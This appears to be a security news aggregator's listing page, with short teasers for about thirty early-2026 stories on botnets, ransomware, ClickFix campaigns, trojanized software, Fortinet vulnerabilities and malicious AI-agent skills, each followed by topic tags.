Developers become the attack vector
Software developers are in demand, including among criminal hackers. Instead of “only” exploiting bugs in applications, criminal hackers are increasingly discovering for themselves the tools and access channels that software developers routinely rely on. In doing so, they have long been combining different cybercrime tactics and also bringing artificial intelligence (AI) into play to reach their goal. “Attackers…
AI, Exploits, Global Security News, malware, Network Security
Four Seconds to Botnet – Analyzing a Self Propagating SSH Worm with Cryptographically Signed C2 [Guest Diary], (Wed, Feb 11th)
[This is a Guest Diary by Johnathan Husch, an ISC intern as part of the SANS.edu BACS program] Weak SSH passwords remain one of the most consistently exploited attack surfaces on the Internet. Even today, botnet operators continue to deploy credential stuffing malware that is capable of performing a full compromise of Linux systems in…
AI, Apps, Cybersecurity, Exploits, Global Security News, malware, Network Security
SSHStalker botnet brute-forces its way onto 7,000 Linux machines
A newly discovered botnet is compromising poorly protected Linux servers by brute-forcing weak SSH passwords. Researchers at Canada-based Flare Systems, who discovered the botnet, got into its staging server and believe at least 7,000 servers had been compromised by the end of January, half of them in the US. The botnet’s weapons include exploits…
AI, Cybercrime, Endpoint, extortion, Global Security News, malware, Ransomware, Risk Management
0APT ransomware group rises swiftly with bluster, along with genuine threat of attack
Most signs suggest the group is running a massive hoax by claiming hundreds of initial victims, but at least some of the threat 0APT poses is grounded in truth backed by proven capabilities.
AI, Global Security News, malware, Security
LummaStealer infections surge after CastleLoader malware campaigns
A surge in LummaStealer infections has been observed, driven by social engineering campaigns leveraging the ClickFix technique to deliver the CastleLoader malware. […]
AI, Global Security News, malware
North Korean Hackers Use Deepfake Video Calls to Target Crypto Firms
Campaign combines stolen Telegram accounts, fake Zoom calls and ClickFix attacks to deploy infostealer malware
AI, Breaking News, cyber crime, Cybersecurity, Exploits, Global Security News, malware, Security
Reynolds ransomware uses BYOVD to disable security before encryption
Researchers discovered Reynolds ransomware, which uses BYOVD technique to disable security tools and evade detection before encryption. Researchers found a new ransomware, named Reynolds, that implements the Bring Your Own Vulnerable Driver (BYOVD) technique to disable security tools and evade detection before encrypting systems. Broadcom’s cybersecurity researchers initially attributed the attack to Black Basta due…
AI, Global Security News, Government & Policy, malware
APT36 and SideCopy Launch Cross-Platform RAT Campaigns Against Indian Entities
Indian defense sector and government-aligned organizations have been targeted by multiple campaigns that are designed to compromise Windows and Linux environments with remote access trojans capable of stealing sensitive data and ensuring continued access to infected machines.
The campaigns are characterized by the use of malware families like Geta RAT, Ares RAT, and DeskRAT, which are often
AI, Global Security News, Industry News, malware, Risk Management
CodeHunter expands behavioral intent analysis to secure the software supply chain
CodeHunter is expanding its behavioral intent technology beyond traditional malware analysis to address supply chain risk and security decision-making across the software development lifecycle (SDLC). According to a recent Gartner report, “software supply chains transcend organizational boundaries and consist of external entities in addition to internal systems.” Gartner also warns that “improper artifact integrity validation…
AI, Cybersecurity, Global Security News, malware
WSL in the Malware Ecosystem, (Wed, Feb 11th)
WSL or “Windows Subsystem for Linux”[1] is a feature in the Microsoft Windows ecosystem that allows users to run a real Linux environment directly inside Windows without needing a traditional virtual machine or dual boot setup. The latest version, WSL2, runs a lightweight virtualized Linux kernel for better compatibility and performance, making it especially useful for…
AI, Endpoint Protection, MacOS Security, Malware, Security, Global Security News, malware, Network Security, Venture
North Korean actors blend ClickFix with new macOS backdoors in Crypto campaign
A financially motivated threat actor tracked as UNC1609 is using a ClickFix-style social engineering campaign to deploy multiple macOS malware families against crypto-focused organizations. According to new research from Google Cloud’s Mandiant, the activity recently targeted an employee at a company operating in the cryptocurrency and decentralized finance (DeFi) sector. The researchers said that the…
AI, Breaking News, cyber crime, Cybercrime, Exploits, Global Security News, hacking, malware, Network Security
SSHStalker botnet targets Linux servers with legacy exploits and SSH scanning
A new Linux botnet, SSHStalker, has infected about 7,000 systems using old 2009-era exploits, IRC bots, and mass-scanning malware. Flare researchers uncovered a previously undocumented Linux botnet dubbed SSHStalker, observed via SSH honeypots over two months. Researchers ran an SSH honeypot with weak credentials starting in early 2026 and spotted a set of intrusions unlike…
AI, ANYRUN, Compliance, Cybersecurity, Data Breaches, Endpoint, Global Security News, malware, Malware Analysis, malware behavior, Risk Management
Emerging Ransomware BQTLock & GREENBLOOD Disrupt Businesses in Minutes
How long would it take your team to realize ransomware is already running? The newly identified ransomware families are already causing real business disruption. These threats can disrupt operations fast while also reducing visibility through stealth or cleanup activity, shrinking the time teams have to detect and contain the attack. Here’s what you should know about BQTLock and GREENBLOOD, and how your team can detect and contain them before…
AI, Global Security News, malware
Fake PDFs harbor new dangers
Cybercriminals send their malware disguised as PDF files. IDG The security vendor Malwarebytes recently warned of a particularly perfidious phishing campaign. The attackers disguise their malware as an ordinary PDF document. Employees are used to receiving orders or invoices in PDF format, so it is very likely that the malicious files will be opened. When an employee clicks on…
AI, Endpoint, Exploits, Global Security News, malware, Microsoft, Security, Vendors and Providers, privacy, Risk Management
Microsoft to roll out a ‘consent first’ model to protect Windows
Windows serves as the backbone of enterprises around the world, powering more than a billion devices and supporting millions of apps. However Microsoft acknowledges that apps are increasingly going rogue, overriding settings, installing additional components, or altering critical Windows capabilities without user awareness or approval. In response, the tech giant plans to roll out what…
AI, Endpoint, Exploits, Global Security News, malware, Network Security, Risk Management, Security, Vulnerabilities
February 2026 Patch Tuesday: Six new and actively exploited Microsoft vulnerabilities addressed
Microsoft highlighted six new and actively exploited vulnerabilities among the 60 fixes issued in today’s February Patch Tuesday releases. However, Tyler Reguly, associate director of security R&D at Fortra, says there’s good news: The issues are easy to resolve with regular Microsoft patches for Windows and Office, and none require any post-patch configuration steps.…
AI, Apple, CryptoCurrency, Global Security News, malware, Security
North Korean hackers use new macOS malware in crypto-theft attacks
North Korean hackers are running tailored campaigns using AI-generated video and the ClickFix technique to deliver malware for macOS and Windows to targets in the cryptocurrency sector. […]
AI, Apps, Compliance, Endpoint, Exploits, Global Security News, malware, Network Security, Risk Management, Russia
Global Group ransomware gang running new campaign using Windows shortcut files
When Microsoft patched a vulnerability last summer that allowed threat actors to use Windows’ shortcut (.lnk) files in exploits, defenders might have hoped use of this tactic would decline. They were wrong. According to researchers at Forcepoint, a new high-volume phishing campaign spreading the Global Group ransomware has been detected that hopes to sucker employees…
AI, Apps, Cybersecurity, Data Breaches, Exploits, Global Security News, malware, Network Security, News, Risk Management, Threats
FortiSandbox XSS Vulnerability Allows Remote Command Execution
Fortinet has disclosed a vulnerability in its FortiSandbox platform that could allow unauthenticated attackers to execute arbitrary commands. The issue involves a cross-site scripting (XSS) flaw in the FortiSandbox web interface that may lead to elevated access if exploited. The vulnerability “… may allow an unauthenticated attacker to execute commands via crafted requests,” said Fortinet…
AI, Cybersecurity, Data Breaches, Endpoint, Exploits, Global Security News, malware, Network Security, News, Risk Management, Threats
Picus Red Report 2026 Shows Attackers Favor Stealth Over Disruption
Cyber attackers are quietly changing how they operate — and the latest Picus Red Report shows that disruption is no longer the goal. Rather than encrypting systems or triggering immediate disruption, Picus Security found that adversaries are prioritizing stealth, persistence, and long-term access within enterprise environments. “The 2026 Red Report confirms that the era of…
AI, Global Security News, malware
Phorpiex Phishing Delivers Low-Noise Global Group Ransomware
High-volume phishing campaign delivers Phorpiex malware via malicious Windows Shortcut files
AI, Cybersecurity, Cybersecurity and Infrastructure Security Agency (CISA), Geopolitics, Global Security News, Government, Government & Policy, malware, Research, Russia
After major Poland energy grid cyberattack, CISA issues warning to U.S. audience
A recent attempt at a destructive cyberattack on Poland’s power grid has prompted the Cybersecurity and Infrastructure Security Agency to publish a warning for U.S. critical infrastructure owners and operators. Tuesday’s alert follows a Jan. 30 report from Poland’s Computer Emergency Response Team that concluded the December attack overlapped significantly with infrastructure used by a Russian…
AI, Apps, Cloud Security, Cybersecurity, Data Breaches, Endpoint, Exploits, Global Security News, malware, Network Security, News, Risk Management, Threats
Bing Ads Abused to Deliver Azure-Hosted Tech Support Scams
A recently identified scam campaign is using Bing search advertisements and Microsoft Azure infrastructure to redirect users to fraudulent tech support pages, demonstrating how legitimate platforms can be misused for social engineering activity. “The tech support scam campaign had a significant initial impact, affecting users across 48 different organizations in the U.S. within a short…
AI, Android, Breaking News, cyber crime, Exploits, Global Security News, malware, Mobile
ZeroDayRAT spyware grants attackers total access to mobile devices
ZeroDayRAT is a commercial mobile spyware that grants full remote access to Android and iOS devices for spying and data theft. ZeroDayRAT is a newly discovered commercial mobile spyware toolkit that gives attackers full control over Android and iOS devices. It supports live camera access, keylogging, and theft of banking and crypto data. First spotted…
AI, Global Security News, malware, Malwarebytes, News, Proxy, YouTube
Trojanized 7-Zip downloads turn home computers into proxy nodes
A trojanized version of the popular 7-Zip software is quietly turning home computers into residential proxy nodes, Malwarebytes warns. Spurred by a Reddit post in which a user complained about getting infected with malware after downloading 7-Zip from 7zip[.]com instead of the legitimate 7-zip.org, Malwarebytes researchers looked into the matter and found that the malicious…
AI, ANYRUN, Cybersecurity, Cybersecurity Lifehacks, Global Security News, malware, malware behavior, Network Security, Risk Management
How to Build Threat Hunting that Defends Your Organization Against Real Attacks
Threat hunting is widely recognized as one of the most important capabilities of a mature SOC. It uncovers stealthy attackers early, reduces dwell time, and prevents security incidents from impacting the business. Yet, in practice, many organizations find that their threat hunting efforts don’t consistently deliver these outcomes. Let’s take a look at how high-performing security teams make threat hunting more repeatable, measurable, and effective. Why Threat Hunting Programs Often Fail Before They Start …
AI, Cybercrime, Malware, Ransomware, Security, Endpoint, Exploits, Global Security News, malware, Network Security
Windows shortcut weaponized in Phorpiex-linked ransomware campaign
Forcepoint X-Labs researchers have identified a large Phorpiex botnet-aided phishing campaign that uses weaponized Windows shortcut files to deploy Global Group ransomware across victim systems. The campaign, observed in late 2024 and continuing into 2026, leverages a common email lure, with the subject “Your Document”, to trick recipients into opening a malicious LNK attachment. “By…
Global Security News, malware
NCSC Issues Warning Over “Severe” Cyber-Attacks Targeting Critical National Infrastructure
NCSC calls on firms to ‘act now’ following disruptive malware attacks targeting Polish energy providers
AI, Apps, Cybersecurity, Data Breaches, Endpoint, EU, Europe, Exploits, Global Security News, Government & Policy, malware, Network Security, News, Risk Management, Threats
European Commission Hit by Mobile Management Data Breach
European Union officials are investigating a cybersecurity incident after attackers breached systems used to manage staff mobile devices, potentially exposing limited personal data. The European Commission said it detected a cyberattack on its central mobile device management infrastructure and moved quickly to contain it. “The EU commission did well to clean systems swiftly and ensure…
AI, Breaking News, Exploits, FortiClientEMS, Fortinet, Global Security News, malware, Network Security, Security
Critical Fortinet FortiClientEMS flaw allows remote code execution
Fortinet warns of a critical FortiClientEMS vulnerability that lets remote attackers run malicious code without logging in. Fortinet issued an urgent advisory to address a critical FortiClientEMS vulnerability, tracked as CVE-2026-21643 (CVSS score of 9.1). The vulnerability is an improper neutralization of special elements used in an SQL Command (‘SQL Injection’) issue in FortiClientEMS. An…
AI, Apps, Artificial Intelligence, Cybersecurity, Data Breaches, Endpoint, Exploits, Global Security News, malware, Network Security, News, Risk Management, Threats
OpenClaw Adds VirusTotal Scanning to AI Agent Marketplace
OpenClaw has moved to strengthen security across its fast-growing agent ecosystem by integrating VirusTotal into its ClawHub skill marketplace. The change follows reports that hundreds of malicious skills were circulating undetected. We “… upload full skill bundles for Code Insight analysis, giving the AI a complete picture of the skill’s behavior rather than just matching…
AI, Exploits, Global Security News, malware
⚡ Weekly Recap: AI Skill Malware, 31Tbps DDoS, Notepad++ Hack, LLM Backdoors and More
Cyber threats are no longer coming from just malware or exploits. They’re showing up inside the tools, platforms, and ecosystems organizations use every day. As companies connect AI, cloud apps, developer tools, and communication systems, attackers are following those same paths. A clear pattern this week: attackers are abusing trust. Trusted updates, trusted marketplaces, trusted…
AI, Cybersecurity, Exploits, Global Security News, malware, Network Security, Risk Management
OpenClaw integrates VirusTotal malware scanning as security firms flag enterprise risks
OpenClaw, the viral open-source AI agent that security firms warn is “insecure by default,” has integrated VirusTotal’s malware scanning into its ClawHub skills marketplace following weeks in which security researchers documented malicious extensions and widespread unauthorized deployments in enterprises. The integration automatically scans all published skills before making them available for download, according to the…
AI, Apps, china, Endpoint, Exploits, Global Security News, malware, Network Security, Network Security, Security
DKnife targets network gateways in long running AitM campaign
A previously undocumented China-linked adversary-in-the-middle (AitM) framework known as “DKnife” has been identified operating at network gateways, where it intercepts and manipulates in-transit traffic. According to Cisco Talos’ findings, the framework has been active since at least 2019 and remains operational as of early 2026. Rather than targeting endpoints directly, DKnife is deployed at the…
